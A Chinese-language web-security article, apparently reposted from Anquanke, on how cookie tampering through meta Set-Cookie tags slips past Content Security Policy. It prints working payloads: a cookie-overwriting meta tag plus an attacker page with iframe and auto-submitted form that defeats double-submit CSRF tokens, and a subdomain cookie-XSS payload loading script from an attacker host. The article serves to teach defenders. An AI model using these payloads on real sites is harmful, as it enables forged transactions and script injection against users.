CSP flaws: cookie fixation

安全 漏洞 应用安全
今天我们来考察一些与Cookie篡改漏洞有关的例子。

[[182419]]

前言

我们知道,CSP不会阻止 这样的标签。因此,对于含有XSS漏洞的页面来说,即使提供了CSP保护,攻击者仍然可以通过写入Cookie来发动攻击。 下面,我们来考察一些与Cookie篡改漏洞有关的例子。

双重提交Cookie示例

双重提交cookie是一些应用程序和框架用于处理CSRF的技术。这意味着所有表单都必须包含一个在cookie中设置的令牌。 如果在表单中发送的令牌与cookie中的令牌不同,则请求被丢弃。 这种技术被OWASP推荐为基于会话的令牌的替代方案。

在伪代码中它可能看起来像这样:

  1. //User sent the form 
  2. if(isset($_POST['submit'])){ 
  3.          if($_POST['token'] == $_COOKIE['token']){ 
  4.                   //Accept the form 
  5.          }else{ 
  6.                   echo "CSRF ATTACK DETECTED"; 
  7.                   exit(); 
  8.          } 

没有CSP的时候,如果应用程序含有XSS漏洞,那么攻击者就可以使用脚本来填写并提交他们想要攻击的任何表单:

  1. <script> 
  2. document.getElementById('sendmoneyto').value = 'Mathias'
  3. document.getElementById('form').submit(); 
  4. </script> 

使用CSP后,我们就可以(通过使用随机数或限制内联脚本)避免这种情况了。然而,攻击者可以使用以下payload来实现同样的事情:

  1. <meta http-equiv="Set-Cookie" content="token=NotSoSecretAnyMore"> 

然后,在攻击者的网站上:

  1. <script> 
  2. function submitForm(){ 
  3.   document.forms[0].submit(); 
  4. </script> 
  5. <iframe src='http://targetapplication/vulnerabletoxss?parameter=<meta http-equiv="Set-Cookie" content="token=NotSoSecretAnyMore">' onload="submitForm()"></iframe> 
  6. <form action="http://targetapplication/targetform" method="POST"> 
  7. <input type="hidden" name="token" value="NotSoSecretAnyMore" /> 
  8. <input type="hidden" name="sendmoneyto" value="Mathias" /> 
  9. </form> 

 

 

 

 

因为攻击者能够改写令牌,所以他们可以在其页面上的表单中使用新令牌,从而绕过CSRF保护措施。

双会话示例

现实中,使用多个会话Cookie的应用程序是非常少见的。例如,主应用程序使用一个会话Cookie,而“次应用程序”使用另一个会话Cookie。

如果攻击者可以篡改cookie,他们就可以让受害者在主应用程序中使用攻击者的会话cookie。这样的话,就可以让受害者在主应用程序中以攻击者身份登录,而在次应用程序中以受害者身份登录。

如果应用程序从主应用程序提取送货数据,那么受害人在次应用程序中购买的产品就会被发往攻击者的地址。

子域cookie XSS示例

如果子域中存在cookie XSS漏洞,攻击者可以使用cookie篡改漏洞来设置XSS cookie,然后重定向到易受攻击的页面:

  1. <meta http-equiv="Set-Cookie" content="vulnerableCookie=<script src=//attackers/page.js>"> 
  2. <meta http-equiv="refresh" content="0;URL=http://othersubdomain.vulnerable/page_vulnerable_to_cookie_xss"> 

 

结论

虽然许多客户端漏洞都可以通过CSP进行缓解,但是Cookie篡改仍然会导致一些安全问题,因为它对于这种漏洞根本不起作用。当开发使用CSP和cookie的应用程序时,一定要注意各种类型攻击的不同之处。

责任编辑:赵宁宁 来源: 安全客
相关推荐

2013-08-21 09:21:01

2013-08-21 10:08:16

2016-09-13 21:30:11

JavascriptCSPWeb

2020-04-29 15:30:22

CSP网页前端

2013-05-15 15:05:53

2012-11-19 10:02:01

cookie poiscookie防篡改cookie

2012-11-14 17:18:58

2009-07-24 17:04:57

ASP.NET中Coo

2014-04-21 10:24:06

2024-07-30 14:31:01

2010-09-07 14:27:04

Cookie

2021-02-09 00:45:51

GoogleCookie隐私

2021-01-28 18:06:49

JavaScriptCookieWeb

2013-11-08 11:15:54

2015-03-25 09:36:27

CSP五钻认证华为

2021-11-15 05:31:37

云厂商CSP网络

2022-06-15 08:56:54

Firefox浏览器Cookie

2021-06-29 13:49:25

GoogleCookie隐私

2015-10-15 11:27:02

cookie安全总结

2009-08-06 16:02:05

无Cookie会话
点赞
收藏

51CTO技术栈公众号